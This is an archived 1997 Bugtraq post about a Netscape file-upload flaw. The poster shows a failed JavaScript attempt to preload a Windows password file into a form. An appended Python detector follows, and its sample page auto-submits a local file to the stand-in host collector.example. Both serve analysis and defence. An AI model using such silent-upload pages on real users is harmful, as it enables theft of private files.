Bugtraq mailing list archives
Re: Netscape Exploit... with technical details.
From: phear () OUTLAWLABS COM NO SPAM (Phear)
Date: Sat, 14 Jun 1997 13:14:38 -0700
Edwin Li-Kai Liu wrote:

> Rusty Conover wrote:
>
> > In my method JavaScript would have to be used to automatically submit
> > a HTML Form to the server. In these forms a page writer could have
> > already coded the file name into the source document, such as
> > "autoexec.bat". When the browser loads the page off of the server, it
> > submits the form which transmits the file to the server via the
> > HTTP-File upload procedure. The SERVER now has the file the author
> > wanted. To fool the user, the CGI program sends the location of the
> > real web page to the client, and the client doesn't know otherwise.
> >
> > This method would require the files to be small or else the user will
> > notice this is taking a long time to load the page over a modem. But
> > the potential for this exploit to be used over faster transmission
> > lines is greater.
> >
> > A solution to this problem would be a warning dialog box, telling the
> > user that they are transmitting a file, not just a regular HTTP form.
> >
> > I have not written a single line of code exploiting this potential
> > vulnerability; I might get around to it if I have time.
> >
> > Please note: I sent this original message 1 day (June 12) before to
> > Netscape and now they confirm that my hypothesis was correct on the
> > URL: http://home.netscape.com/misc/security_update.html
>
> Yes, this is absolutely correct. You have proved my points also. Please
> see my message on the netscape.security newsgroup, titled "Re: Security
> BUG". I then posted the same message to other newsgroups one day after,
> which is today. I want the public to know the truth, instead of
> panicking. The following is the original message.
>
> <snip>
Well, I would be MORE than excited to see some code for this. When I saw the story on CNN, I immediately went to work and tried to duplicate it.

The only thing I could think of that would allow the retrieval of files was the <INPUT TYPE="File"> form element, which sends the file as ENCTYPE multipart/form-data. I wrote a little shell script to display everything that the form sent, and I wrote the web page, with three javascript functions: one to load up the File box with the filename, one to press the submit button, and a function to be called by the body onload event.

It's a great idea, but I think Netscape has already thought of it, because every attempt to load the file box programmatically resulted in a javascript error pointing out that the File input type was READ-ONLY. I even made it a textbox first, and then tried to change the type after loading the filename:

    document.form.textbox.value="c:\windows\someone.pwl"
    document.form.textbox.type="file"

And it still doesn't work.

So, while this seems to be the only place I can think of for the bug, all attempts at exploiting it have failed. Unless you can get around the read-only state of the file input box, I don't know how it can work.

Anyway, my two cents..

phear
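The page shape discussed in this thread (a multipart/form-data form holding a file input with a preset file name, plus script that submits it on body onload) is easy to spot in saved HTML. The following is an added example, not code from the thread or from Netscape: a small Python scanner that flags such forms in a page so a proxy log or crawl can be checked for them. The two sample pages and the host name collector.example are constructed for the example, and the .submit() heuristic is an assumption about how auto-submission would be written.

```python
# Added example (not from the original thread): static check for HTML pages
# that hold a file-upload form and script that submits it without a click.
# Sample pages below are constructed; the submit() heuristic is an assumption.
import re
from html.parser import HTMLParser

# Any script text or onload handler calling form.submit() counts as auto-submit.
SUBMIT_CALL = re.compile(r"\.submit\s*\(")


class _FormScanner(HTMLParser):
    """Collects <form> elements, their file inputs, and every script body."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []        # inline <script> text plus the <body onload> handler
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {
                "name": a.get("name", ""),
                "action": a.get("action", ""),
                "enctype": a.get("enctype", "").lower(),
                "file_inputs": [],
            }
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "file":
                self._form["file_inputs"].append(
                    {"name": a.get("name", ""), "value": a.get("value", "")}
                )
        elif tag == "body" and a.get("onload"):
            self.scripts.append(a["onload"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_auto_upload_forms(html):
    """Return one finding per file-upload form that is auto-submitted or has
    a preset file name; ordinary upload forms needing a click are skipped."""
    p = _FormScanner()
    p.feed(html)
    p.close()
    auto_submit = any(SUBMIT_CALL.search(s) for s in p.scripts)
    findings = []
    for f in p.forms:
        if f["enctype"] != "multipart/form-data" or not f["file_inputs"]:
            continue
        preset = any(i["value"] for i in f["file_inputs"])
        if auto_submit or preset:
            findings.append({
                "form": f["name"],
                "action": f["action"],
                "files": [i["value"] for i in f["file_inputs"]],
                "auto_submit": auto_submit,
                "preset_value": preset,
            })
    return findings


# Constructed sample: the page shape the thread describes.
SUSPICIOUS_PAGE = r"""
<html><head><script>
function go() { document.f.submit(); }
</script></head>
<body onload="go()">
<form name="f" action="http://collector.example/upload.cgi" method="post"
      enctype="multipart/form-data">
  <input type="file" name="doc" value="c:\autoexec.bat">
</form>
<p>Welcome to our page.</p>
</body></html>
"""

# Constructed sample: an ordinary upload form that needs a user click.
BENIGN_PAGE = """
<html><body>
<form action="/upload" method="post" enctype="multipart/form-data">
  <input type="file" name="photo">
  <input type="submit" value="Upload">
</form>
</body></html>
"""

if __name__ == "__main__":
    for page in (SUSPICIOUS_PAGE, BENIGN_PAGE):
        print(find_auto_upload_forms(page))
```

The check is a heuristic for triage rather than a blocker: a legitimate page may call submit() from script for other reasons, so each finding should be read together with the form's action host. The browser-side protection the thread arrives at, the file input being read-only to script, is what actually stops the upload; this scanner only shows which saved pages attempted it.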
Current thread:
- Re: Netscape Exploit... with technical details. Edwin Li-Kai Liu (Jun 14)
- <Possible follow-ups>
- Re: Netscape Exploit... with technical details. Phear (Jun 14)